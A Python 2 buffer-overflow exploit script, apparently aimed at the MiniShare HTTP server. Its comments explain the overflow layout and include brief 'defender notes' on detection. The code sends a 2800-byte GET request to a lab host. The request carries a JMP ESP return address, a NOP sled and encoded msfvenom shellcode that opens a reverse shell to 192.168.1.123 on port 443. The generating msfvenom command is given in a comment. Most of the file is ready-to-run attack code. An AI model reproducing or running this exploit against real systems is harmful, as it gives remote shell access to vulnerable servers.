#!/usr/bin/python
# Buffer-overflow proof of concept, apparently aimed at the MiniShare HTTP
# server (inferred from the filename -- TODO confirm). Written in Python 2
# syntax (print statements, implicit str/bytes), so it will not run unchanged
# under Python 3.
#
# Defender notes: what goes on the wire is a single GET whose request-line is
# about 2800 bytes of 0x41/0x90/0x43 padding plus an encoded payload, sent to
# TCP port 80 -- an abnormally long request-URI that is straightforward to
# flag in HTTP access logs and IDS rules. The return address, the target host
# below and the LHOST/LPORT in the msfvenom line are lab-specific values.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 TCP client socket
# 774699BF FFE4 JMP ESP
# bad characters \x00\x0d
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows
# 351-byte encoded payload: 24 adjacent string literals that the parser
# concatenates into one str.
shellcode = ("\xdb\xd6\xd9\x74\x24\xf4\xb8\x2a\x89\xf7\x52\x5f\x33\xc9\xb1"
"\x52\x31\x47\x17\x03\x47\x17\x83\xc5\x75\x15\xa7\xe5\x6e\x58"
"\x48\x15\x6f\x3d\xc0\xf0\x5e\x7d\xb6\x71\xf0\x4d\xbc\xd7\xfd"
"\x26\x90\xc3\x76\x4a\x3d\xe4\x3f\xe1\x1b\xcb\xc0\x5a\x5f\x4a"
"\x43\xa1\x8c\xac\x7a\x6a\xc1\xad\xbb\x97\x28\xff\x14\xd3\x9f"
"\xef\x11\xa9\x23\x84\x6a\x3f\x24\x79\x3a\x3e\x05\x2c\x30\x19"
"\x85\xcf\x95\x11\x8c\xd7\xfa\x1c\x46\x6c\xc8\xeb\x59\xa4\x00"
"\x13\xf5\x89\xac\xe6\x07\xce\x0b\x19\x72\x26\x68\xa4\x85\xfd"
"\x12\x72\x03\xe5\xb5\xf1\xb3\xc1\x44\xd5\x22\x82\x4b\x92\x21"
"\xcc\x4f\x25\xe5\x67\x6b\xae\x08\xa7\xfd\xf4\x2e\x63\xa5\xaf"
"\x4f\x32\x03\x01\x6f\x24\xec\xfe\xd5\x2f\x01\xea\x67\x72\x4e"
"\xdf\x45\x8c\x8e\x77\xdd\xff\xbc\xd8\x75\x97\x8c\x91\x53\x60"
"\xf2\x8b\x24\xfe\x0d\x34\x55\xd7\xc9\x60\x05\x4f\xfb\x08\xce"
"\x8f\x04\xdd\x41\xdf\xaa\x8e\x21\x8f\x0a\x7f\xca\xc5\x84\xa0"
"\xea\xe6\x4e\xc9\x81\x1d\x19\x36\xfd\x37\xc6\xde\xfc\x47\xf9"
"\xa5\x88\xa1\x93\xc9\xdc\x7a\x0c\x73\x45\xf0\xad\x7c\x53\x7d"
"\xed\xf7\x50\x82\xa0\xff\x1d\x90\x55\xf0\x6b\xca\xf0\x0f\x46"
"\x62\x9e\x82\x0d\x72\xe9\xbe\x99\x25\xbe\x71\xd0\xa3\x52\x2b"
"\x4a\xd1\xae\xad\xb5\x51\x75\x0e\x3b\x58\xf8\x2a\x1f\x4a\xc4"
"\xb3\x1b\x3e\x98\xe5\xf5\xe8\x5e\x5c\xb4\x42\x09\x33\x1e\x02"
"\xcc\x7f\xa1\x54\xd1\x55\x57\xb8\x60\x00\x2e\xc7\x4d\xc4\xa6"
"\xb0\xb3\x74\x48\x6b\x70\x94\xab\xb9\x8d\x3d\x72\x28\x2c\x20"
"\x85\x87\x73\x5d\x06\x2d\x0c\x9a\x16\x44\x09\xe6\x90\xb5\x63"
"\x77\x75\xb9\xd0\x78\x5c")
# Layout of the 2800-byte request payload: 1787 filler bytes (presumably the
# offset to the overwritten return address -- not verifiable from here), the
# address from the JMP ESP comment above in little-endian byte order, a
# 16-byte 0x90 sled, the 351-byte payload, then "C" filler so the total length
# stays exactly 2800 (the 351 term in the subtraction is len(shellcode)).
buffer = "A" * 1787 + "\xbf\x99\x46\x77" + "\x90" * 16 + shellcode + "C" * (2800 - 1787 - 4 - 351 - 16)
try:
    print "\nSending evil buffer..."
    s.connect(("192.168.1.131", 80))
    s.send('GET ' + buffer + 'HTTP/1.1\r\n\r\n')
    print "\nDone!."
except:
    # Bare except: every failure (connect, send, even KeyboardInterrupt) is
    # reported as a connection problem, and the socket is never closed.
    print "Could not connect to HTTP!"